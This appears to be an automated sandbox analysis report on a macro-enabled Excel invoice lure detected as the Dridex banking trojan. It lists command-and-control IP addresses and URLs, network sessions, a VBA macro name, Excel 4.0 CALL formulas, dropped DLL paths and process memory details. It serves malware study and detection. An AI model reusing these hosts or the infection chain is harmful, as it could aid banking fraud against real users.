Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: www5.ritamartins.pt
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236863472.0000000000171000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2237170577.0000000000174000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236863472.0000000000171000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236863472.0000000000171000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2388405613.00000000023D0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241751629.00000000040C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2387778399.0000000001D40000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2388107432.0000000001F00000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2237799499.0000000002320000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2388405613.00000000023D0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241751629.00000000040C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65/k
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65/u
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65:1512/
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233/
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233/N
Source: regsvr32.exe, 00000004.00000002.2387949260.00000000008AF000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233:3389/
Source: regsvr32.exe, 00000004.00000002.2387949260.00000000008AF000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233:3389/4V
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmpString found in binary or memory: https://77.220.64.37/Bf
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmpString found in binary or memory: https://77.220.64.37/Kf
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27/K
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27/x
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27:3308/
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49346
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49224
Source: unknownNetwork traffic detected: HTTP traffic on port 49294 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49342
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49220
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
Source: unknownNetwork traffic detected: HTTP traffic on port 49204 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
Source: unknownNetwork traffic detected: HTTP traffic on port 49242 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49374 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49342 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49338
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49216
Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49334
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49298
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49330
Source: unknownNetwork traffic detected: HTTP traffic on port 49262 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49294
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
Source: unknownNetwork traffic detected: HTTP traffic on port 49354 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49290
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49282 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49322 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49208
Source: unknownNetwork traffic detected: HTTP traffic on port 49230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49326
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49204
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49322
Source: unknownNetwork traffic detected: HTTP traffic on port 49330 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49200
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49318 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49282
Source: unknownNetwork traffic detected: HTTP traffic on port 49338 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49386 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49258 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49318
Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49314
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49278
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49310
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49398
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49274
Source: unknownNetwork traffic detected: HTTP traffic on port 49394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49394
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49390
Source: unknownNetwork traffic detected: HTTP traffic on port 49208 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49196 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49310 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49366 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49306
Source: unknownNetwork traffic detected: HTTP traffic on port 49326 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49302
Source: unknownNetwork traffic detected: HTTP traffic on port 49290 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49266
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49386
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49262
Source: unknownNetwork traffic detected: HTTP traffic on port 49370 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49382
Source: unknownNetwork traffic detected: HTTP traffic on port 49200 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49378 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49306 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49346 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49220 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49258
Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49350 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49378
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49254
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49374
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49250
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49370
Source: unknownNetwork traffic detected: HTTP traffic on port 49358 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49246
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49366
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49242
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49362
Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49254 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49382 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49238
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49358
Source: unknownNetwork traffic detected: HTTP traffic on port 49398 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49234
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49354
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49230
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49196
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49350
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49192
Source: unknownNetwork traffic detected: HTTP traffic on port 49390 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49314 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49274 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49362 -> 443
Source: unknownHTTPS traffic detected: 185.2.4.104:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49180 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49192 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49196 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49204 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49208 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49212 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49216 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49216 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49220 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49224 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49230 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49234 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49238 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49242 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49246 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49250 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49254 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49258 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49262 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49266 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49270 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49274 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49278 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49282 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49286 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49290 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49294 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49298 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49302 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49306 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49310 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.168.2.22:49310 -> 77.220.64.37:443 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49314 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49318 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49322 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49326 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49330 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49334 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49338 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49342 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49346 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49350 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49354 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49358 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49362 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49366 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49370 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49374 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49378 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49382 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49386 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49390 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49394 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49398 version: TLS 1.2

E-Banking Fraud:

barindex
Detected Dridex e-Banking trojanShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002B5150 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,4_2_002B5150
Source: C:\Windows\System32\DWWIN.EXEFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCCJump to dropped file

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")Name: pagesREviewsd
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")Name: pagesREviewsd
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: INV3867196801-20210111675616.xlsmInitial sample: CALL
Source: INV3867196801-20210111675616.xlsmInitial sample: CALL
Source: INV3867196801-20210111675616.xlsmInitial sample: CALL
Source: INV3867196801-20210111675616.xlsmInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\jczxic.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d4bfa7nne[1].zipJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C22A0 NtDelayExecution,4_2_002C22A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002DBE30 NtClose,4_2_002DBE30
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001BB770 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,4_2_001BB770
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001BBA14 NtSetInformationProcess,4_2_001BBA14
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002B51504_2_002B5150
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D10204_2_002D1020
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CD0304_2_002CD030
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CE0A04_2_002CE0A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002DDCA04_2_002DDCA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D50A04_2_002D50A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D4CA04_2_002D4CA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D5CB04_2_002D5CB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C88C04_2_002C88C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C8CC04_2_002C8CC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C98DA4_2_002C98DA
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002BACD04_2_002BACD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CA0D04_2_002CA0D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C75644_2_002C7564
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002B15704_2_002B1570
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002BF9A04_2_002BF9A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CD9804_2_002CD980
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002DD1804_2_002DD180
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CC5904_2_002CC590